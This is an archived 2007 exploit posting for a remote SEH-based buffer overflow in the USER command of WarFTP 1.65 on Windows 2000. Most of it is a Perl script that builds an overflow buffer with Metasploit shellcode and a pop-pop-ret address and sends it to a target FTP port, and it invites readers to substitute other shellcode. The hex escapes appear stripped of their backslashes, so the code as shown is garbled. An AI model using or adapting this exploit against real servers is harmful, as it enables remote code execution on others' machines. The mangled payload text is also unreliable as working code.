warftp-2.txt
Posted on 20 March 2007
# =============================================================================================== # WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit # By Umesh Wanve # =============================================================================================== # # Date : 15-03-2007 # # Tested on Windows 2000 SP4 Server English # Windows 2000 SP4 Professional English # # You can replace shellcode with your favourite one :) # # # Well I used different technique here. Rather than overwriting EIP, I used SEH handler overwrite # method. Preety simple. # # Stack ---> buffer === AAAAA......... # | # Pointer to next SEH === Short Jump to Hellcode # | # SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4) # | # NOP Sled === Nop Sled # | # Hellcode === Hell......... # # # # # P.S: This was written for educational purpose. Use it at your own risk.Author will be not be # responsible for any damage. # # Always Thanks to Metasploit. # #================================================================================================== #!/usr/bin/perl use IO::Socket; #use strict; # win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com my($shellcode)= "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49". "x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42". "x58x50x30x41x31x42x41x6bx41x41x52x32x41x42x41x32". "x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a". "x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c". "x4bx73x4cx74x45x31x68x54x41x68x6fx6cx4bx70x4fx57". "x68x6ex6bx71x4fx45x70x65x51x5ax4bx67x39x4cx4bx50". "x34x4cx4bx77x71x68x6ex75x61x4bx70x4ex79x6ex4cx4d". "x54x4bx70x72x54x65x57x69x51x49x5ax46x6dx37x71x6f". "x32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7a". "x45x6cx4bx53x6fx51x34x37x71x48x6bx51x76x4cx4bx76". "x6cx50x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65". "x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78". "x43x74x71x49x50x30x64x6ex6bx43x70x44x70x4cx45x4f". "x30x41x68x44x4cx4ex6bx63x70x44x4cx6ex6bx30x70x65". "x4cx4ex4dx6cx4bx30x68x75x58x7ax4bx35x59x4cx4bx4d". "x50x58x30x37x70x47x70x77x70x6cx4bx65x38x57x4cx31". "x4fx66x51x48x76x65x30x70x56x4dx59x4ax58x6ex63x69". "x50x31x6bx76x30x55x38x5ax50x4ex6ax36x64x63x6fx61". "x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4fx4bx57x70". "x63x51x71x32x4cx52x43x37x70x42"; my($pointer_to_next_seh)="xebx06x90x90"; # Short Jump my($seh_handler)="xa9x11x02x75"; #pop, pop, ret #(ws2help.dll win2000 sp4) if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { $exploit = "USER ". #Vulnerable Command ("A"x485). #Buffer "BBBB". #EIP Overwrites here :) ("x90" x 80). #Garbage $pointer_to_next_seh. $seh_handler. ("x90" x 10). $shellcode. #ur code ("x90" x 10). " "; print $socket $exploit; sleep(1); close($socket); } else { print "Cannot connect to $ARGV[0]:21 "; }